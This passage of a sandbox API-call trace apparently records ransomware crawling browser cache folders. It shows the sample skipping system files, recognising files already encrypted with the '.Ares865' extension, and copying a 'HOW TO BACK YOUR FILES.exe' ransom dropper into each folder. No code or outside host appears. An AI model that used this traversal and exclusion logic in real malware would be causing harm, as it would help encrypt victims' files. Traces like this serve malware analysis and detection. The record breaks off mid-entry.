cFileName="X9OHK109", cAlternateFileName="")) returned 1 [0065.639] lstrcmpiW (lpString1="X9OHK109", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0065.639] lstrcmpiW (lpString1="X9OHK109", lpString2="aoldtz.exe") returned 1 [0065.640] lstrcmpiW (lpString1="X9OHK109", lpString2=".") returned 1 [0065.640] lstrcmpiW (lpString1="X9OHK109", lpString2="..") returned 1 [0065.640] lstrcmpiW (lpString1="X9OHK109", lpString2="windows") returned 1 [0065.640] lstrcmpiW (lpString1="X9OHK109", lpString2="bootmgr") returned 1 [0065.640] lstrcmpiW (lpString1="X9OHK109", lpString2="temp") returned 1 [0065.640] lstrcmpiW (lpString1="X9OHK109", lpString2="pagefile.sys") returned 1 [0065.640] lstrcmpiW (lpString1="X9OHK109", lpString2="boot") returned 1 [0065.640] lstrcmpiW (lpString1="X9OHK109", lpString2="ids.txt") returned 1 [0065.640] lstrcmpiW (lpString1="X9OHK109", lpString2="ntuser.dat") returned 1 [0065.640] lstrcmpiW (lpString1="X9OHK109", lpString2="perflogs") returned 1 [0065.640] lstrcmpiW (lpString1="X9OHK109", lpString2="MSBuild") returned 1 [0065.640] lstrlenW (lpString="X9OHK109") returned 8 [0065.640] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned 99 [0065.640] lstrcpyW (in: lpString1=0x2cce4b6, lpString2="X9OHK109" | out: lpString1="X9OHK109") returned="X9OHK109" [0065.640] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2260 [0065.640] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc8) returned 0x2cb310 [0065.640] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2268 | out: ListHead=0x2e7710, ListEntry=0x2d2268) returned 0x2d2248 [0065.640] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x558c04c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x558c04c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="X9OHK109", cAlternateFileName="")) returned 0 [0065.640] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0065.640] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2268 [0065.640] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0065.640] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb310 | out: hHeap=0x2b0000) returned 1 [0065.640] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2260 | out: hHeap=0x2b0000) returned 1 [0065.640] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned 99 [0065.640] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0065.640] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.640] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\temporary internet files\\content.ie5\\x9ohk109\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.641] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0065.641] GetLastError () returned 0x0 [0065.641] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.641] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.641] CloseHandle (hObject=0x12c) returned 1 [0065.641] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.641] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.641] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x558c04c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x558c04c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.641] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.641] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.641] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.641] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x558c04c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x558c04c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.642] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.642] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0065.642] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.642] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.642] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x65f4020, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x65f4020, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x558c04c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x350, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini.Ares865", cAlternateFileName="DESKTO~1.ARE")) returned 1 [0065.642] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.642] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="aoldtz.exe") returned 1 [0065.642] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2=".") returned 1 [0065.642] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="..") returned 1 [0065.642] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="windows") returned -1 [0065.642] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="bootmgr") returned 1 [0065.642] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="temp") returned -1 [0065.642] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="pagefile.sys") returned -1 [0065.642] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="boot") returned 1 [0065.642] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ids.txt") returned -1 [0065.642] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ntuser.dat") returned -1 [0065.642] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="perflogs") returned -1 [0065.642] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="MSBuild") returned -1 [0065.642] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0065.642] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\*") returned 101 [0065.642] lstrcpyW (in: lpString1=0x2cce4c8, lpString2="desktop.ini.Ares865" | out: lpString1="desktop.ini.Ares865") returned="desktop.ini.Ares865" [0065.642] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0065.642] lstrlenW (lpString="Ares865") returned 7 [0065.642] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0065.642] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a4e2660, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a4e2660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0065.642] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0065.642] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a4e2660, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a4e2660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0065.642] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0065.642] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2248 [0065.642] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0065.642] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5fb0 | out: hHeap=0x2b0000) returned 1 [0065.642] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2240 | out: hHeap=0x2b0000) returned 1 [0065.643] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned 99 [0065.643] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0065.643] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.643] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\temporary internet files\\content.ie5\\rijuql1c\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.643] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0065.643] GetLastError () returned 0x0 [0065.643] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.643] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.643] CloseHandle (hObject=0x12c) returned 1 [0065.644] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.644] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.644] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x558e6620, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x558e6620, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.644] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.644] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.644] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.644] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x558e6620, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x558e6620, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.644] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.644] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0065.644] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.644] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.644] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x65f4020, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x65f4020, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x5590c780, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x350, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini.Ares865", cAlternateFileName="DESKTO~1.ARE")) returned 1 [0065.644] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.644] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="aoldtz.exe") returned 1 [0065.644] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2=".") returned 1 [0065.644] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="..") returned 1 [0065.644] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="windows") returned -1 [0065.644] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="bootmgr") returned 1 [0065.644] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="temp") returned -1 [0065.644] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="pagefile.sys") returned -1 [0065.644] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="boot") returned 1 [0065.644] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ids.txt") returned -1 [0065.644] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ntuser.dat") returned -1 [0065.644] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="perflogs") returned -1 [0065.644] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="MSBuild") returned -1 [0065.644] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0065.644] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\*") returned 101 [0065.644] lstrcpyW (in: lpString1=0x2cce4c8, lpString2="desktop.ini.Ares865" | out: lpString1="desktop.ini.Ares865") returned="desktop.ini.Ares865" [0065.644] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0065.645] lstrlenW (lpString="Ares865") returned 7 [0065.645] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0065.645] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a613160, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0065.645] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0065.645] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a613160, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0065.645] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0065.645] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c30 [0065.645] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0065.645] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0065.645] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0065.645] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned 99 [0065.645] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0065.645] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.645] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\temporary internet files\\content.ie5\\pmmr5k9k\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.645] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0065.646] GetLastError () returned 0x0 [0065.646] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.646] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.646] CloseHandle (hObject=0x12c) returned 1 [0065.646] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.646] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.646] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x559328e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x559328e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.646] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.646] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.646] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.646] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x559328e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x559328e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.646] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.646] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0065.646] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.646] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.646] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x65f4020, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x65f4020, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x559328e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x350, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini.Ares865", cAlternateFileName="DESKTO~1.ARE")) returned 1 [0065.646] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.646] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="aoldtz.exe") returned 1 [0065.646] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2=".") returned 1 [0065.646] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="..") returned 1 [0065.646] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="windows") returned -1 [0065.646] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="bootmgr") returned 1 [0065.647] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="temp") returned -1 [0065.647] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="pagefile.sys") returned -1 [0065.647] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="boot") returned 1 [0065.647] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ids.txt") returned -1 [0065.647] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ntuser.dat") returned -1 [0065.647] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="perflogs") returned -1 [0065.647] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="MSBuild") returned -1 [0065.647] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0065.647] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\*") returned 101 [0065.647] lstrcpyW (in: lpString1=0x2cce4c8, lpString2="desktop.ini.Ares865" | out: lpString1="desktop.ini.Ares865") returned="desktop.ini.Ares865" [0065.647] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0065.647] lstrlenW (lpString="Ares865") returned 7 [0065.647] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0065.647] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a613160, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0065.647] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0065.647] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a613160, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, 